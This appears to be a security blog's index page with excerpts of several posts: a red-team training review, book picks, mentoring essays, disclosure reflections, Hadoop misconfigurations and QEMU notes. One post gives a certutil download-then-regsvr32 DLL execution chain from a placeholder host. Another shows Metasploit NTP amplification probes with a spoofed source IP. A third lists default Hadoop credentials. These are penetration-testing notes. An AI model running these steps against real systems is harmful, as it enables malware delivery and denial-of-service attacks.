Dark Side Ops I & 2 Review

Dark Side Ops I
https://silentbreaksecurity.com/training/dark-side-ops/
https://www.blackhat.com/us-17/training/dark-side-ops-custom-penetration-testing.html

A really good overview of the class is here: https://www.ethicalhacker.net/features/root/course-review-dark-side-ops-custom-penetration-testing

I enjoyed the class. This was actually my second time taking the class and it wasn't nearly as overwhelming the 2nd time :-) I'll try not to cover what is in Raphael's article as it is still applicable and I am assuming you read it before continuing on.

I really enjoyed the Visual Studio time and building Slingshot and Throwback myself along with getting a taste for extending the implant by adding the keylogger, mimikatz, and hashdump modules. Windows API developers may be able to greatly extend Slingshot but I don't think I have enough WinAPI kung fu to do it and there wasn't enough setup around the "how" to consistently do it either unless you have a strong Windows API background. However, one of the labs consisted of adding load and run PowerShell functionality which allows you to make use of the plethora of PowerShell code out there.

There was also a great lab where we learned how to pivot through a compromised SOHO router and the technique could also be extended for VPS or cloud providers.

Cons of the class.

The visual...

Books I’d give to my 30yr old self

A good friend/co-worker recently turned 30. In preparation for his birthday party I gave some thought to my 30th birthday and the things I now know or have an idea about and what I wish I had known at that point in my life. I decided to buy him a few books that had impacted my life since my 30th birthday and that I wish I had known or read earlier in life.

I'll split the post into two parts; computer books and life/metaphysical books.

Computer books

This is by no means an exhaustive list. A more exhaustive list can be found here (recently updated).

He already had The Web Application Hacker's Handbook but had he not I would have purchased a copy for him. There are lots of Web Hacking books but WAHH is probably the best and most comprehensive one.

The other books I did purchase were The Phoenix Project and Zero to One.

The Phoenix Project is absolutely one of the best tech books I've read in the last few years. Working for Silicon Valley companies I think it can be easy to take for granted the whole idea of DevOps and the power it brings...

Mentoring: On Blogging

Received the question about blogging. More specifically:

How and Why
How to benefit from blogging
How to be consistent with posting

In my mind, the key to success and blogging is to be totally selfish in its planning and execution.

Blogging is a personal activity/journey that you allow the public to be a part of. What I mean by this is that the main audience for your blog should be YOU. My blog is a place where I take notes and occasionally try to talk about more touchy-feely topics or issues. These notes are notes that I'm ok with sharing publicly. I also keep a private blog (but really more notes/cheat-sheet, think RTFM...I use MDwiki) because you don't need to give everyone all your tricks and secrets. If you show up for a new job and everyone knows your tricks because you've shared them publicly (because you need attention from strangers) what value are you bringing to your employer?

The benefit to blogging is note taking. I'm a HUGE proponent of taking notes and I'd chalk a lot of my success up to taking copious notes. When I figure out how to mess with technology X, I take notes on...

Certutil for delivery of files

Quick post putting together some twitter awesomeness

References:
https://twitter.com/subtee/status/888125678872399873
https://twitter.com/subTee/status/888071631528235010
https://twitter.com/malwaretechblog/status/733651527827623936

Let's do it

1. Create your DLL
2. Base64 encode it (optional)
3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down
4. Base64 decode the file with certutil
5. Execute the dll with regsvr32: regsvr32 /s /u mydll.dll

Follow up to the vuln disclosure post

Summary of responses from this post: http://carnal0wnage.attackresearch.com/2017/06/vulnerability-disclosure-free-bug.html

I wanted to document/summarize some of the responses I received and some of the insights I gained via self observation and my interactions with others on the topic.

I received a few replies (less than I hoped for though). To summarize a few:

- I'm not a greedy bastard for thinking it would "be nice" to get paid for reporting a vuln but I should not expect them.
- Bug Bounty awards are appreciation for the work, not a right.
- Someone made a nice analogy to losing AWS/Slack keys to losing a cell phone or cat. Every person might value the return of that cat or phone differently.
- I'm super late to the game if I want to get on the "complain about bug bounties / compensation" train. **I think this is not quite the same situation but I appreciate the comment**
- The bigger the company, the harder it is to issue an ad-hoc reward if they don't have an established process.
- They have value - just not monetary. The value is to the end-user.
- Generally speaking, I think quite a lot of the BB crowd have a self-entitled, bad attitude.
- Always ask yourself if this...

Vulnerability Disclosure, Free Bug Reports & Being a Greedy Bastard

Backstory:

Most of my life I've been frustrated/intrigued that my Dad was constantly upset that he would "do the right thing" by people and in return people wouldn't show him gratitude... up to straight up fucking him over in return. Over and over the same cycle would repeat of him doing right by someone only to have that person not reciprocate.

The above is important as it relates to the rest of the post and topic(s).

I was relaying some frustrations to a close non-infosec friend about my experience of discovering companies had made some fairly serious Internet security uh ohs... like misconfigured s3 buckets full of db backups and creds, root AWS keys checked into github, or slack tokens checked into github/pastebin that would give companies a "REALLY bad day". These companies had been receptive to the reporting and fixed the problem but did NOT have bug bounty programs and thus did not pay a bounty for the reporting of the issue.

My friend, with some great insight and observation, suggested that I was getting frustrated and doing exactly the same thing my Dad was doing by having assumptions on how other people should behave.

So this blog post is an attempt for...

NTP/SNMP amplification attacks

I needed to verify an SNMP and NTP amplification vulnerability was actually working. Metasploit has a few scanners for ntp vulns in auxiliary/scanner/ntp/ntp_* and it will report hosts as being vulnerable to amplification attacks.

msf auxiliary(ntp_readvar) > run
Sending NTP v2 READVAR probes to 1.1.1.1->1.1.1.1 (1 hosts)
1.1.1.1:123 - Vulnerable to NTP Mode 6 READVAR DRDoS: No packet amplification and a 34x, 396-byte bandwidth amplification

I've largely not paid attention to these types of attacks in the past but in this case needed to validate I could get the vulnerable host to send traffic to a target/spoofed IP.

I set up 2 boxes to run the attack; an attack box and a target box that I used as the spoofed source IP address. I ran tcpdump on the target/spoofed server (yes...listening for UDP packets) and it was receiving no UDP packets when I ran the attack. If I didn't spoof the source IP, the vulnerable server would send data back to the attacker IP but not the spoofed IP.

Metasploit (running as root) can spoof the IP for you:

msf auxiliary(ntp_readvar) > set SRCIP 2.2.2.2
SRCIP => 2.2.2.2
msf auxiliary(ntp_readvar) > run
Sending NTP v2 READVAR probes to 1.1.1.1->1.1.1.1 (1 hosts)
Sending...

Mentoring: On meeting your **Heroes**

I put heroes in asterisks because none of us have paparazzi following us around. I regularly use Val Smith's quote that even the most popular infosec person is like being a famous bowler. Except for rare exceptions, no one outside of our community knows who we are. I've broken into at least one company from every vertical and my neighbor just asks me to help configure his wifi.

This topic came up because the person I'm mentoring met "a famous infosec person" and the guy proceeded to be a drunk dbag to him. It ended up taking quite a bit of wind out of his sail to have someone he kinda looked up to bag on his current career state and talks he was working on.

When I first joined the Army I thought anyone with a "tower of power" (Expert Infantry Badge, Airborne, Air Assault) was an awesome, do no wrong, individual. Shit, if someone has all this shit on their chest they must be badass right??!!

For more info on badges: https://en.wikipedia.org/wiki/Badges_of_the_United_States_Army

Well the Army does a great job of stacking the people you initially meet...

DevOoops: Hadoop

What is Hadoop?

"The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely on hardware to deliver high-availability, the library itself is designed to detect and handle failures at the application layer, so delivering a highly-available service on top of a cluster of computers, each of which may be prone to failures."

from: http://hadoop.apache.org/

If you've ever heard of MapReduce...you've heard of Hadoop.

NFI what I'm talking about? Here is a 3 minute video on it: https://www.youtube.com/watch?v=8wjvMyc01QY

What are common issues with MapReduce / Hadoop?

Hadoop injection points from Kaluzny zeronights talk:

Hue

Common defaults admin/admin, cloudera/cloudera
Although occasionally you'll find one that will just let you pick your own :-)
If you gain access, full HDFS access, run queries, etc

HDFS WebUI

HDFS exposes a web server which is capable of performing basic status monitoring and file browsing operations. By default this is exposed on port 50070...

Raspbian/Kano OS in QEMU

Quick notes

I wanted to be able to boot the Kano OS in a virtual machine so I could play hack minecraft with the kids and play along with the Kano OS desktop/games. I was trying to avoid plugging a raspberry pi into a monitor to use and wanted to use it on my local laptop.

Well, not so easy. VirtualBox/VMware don't support ARM. However QEMU does.

This repo (https://github.com/dhruvvyas90/qemu-rpi-kernel/wiki/Emulating-Jessie-image-with-4.x.xx-kernel) had the recent raspberry pi kernels to use with QEMU.

Following the steps on that page with regards to mounting the image and editing /etc/ld.so.preload and /etc/fstab, I was able to get the image to boot up successfully...slow as hell...but it technically was working.

command to boot with vnc:
$ qemu-system-arm -vnc :1 -kernel qemu-rpi-kernel/kernel-qemu-4.4.34-jessie -cpu arm1176 -m 256 -M versatilepb -append "root=/dev/sda2 rootfstype=ext4 rw" -hda Kanux-Beta-v3.9.0-Lovelace-jessie-rc-2017-03-23_04-48.img

OS with vnc:

It was so horribly slow I don't think this is feasible. I am going to try using libvirt to make it better or just see if I can play hack minecraft another way. If I get anywhere further with the project I'll post an update.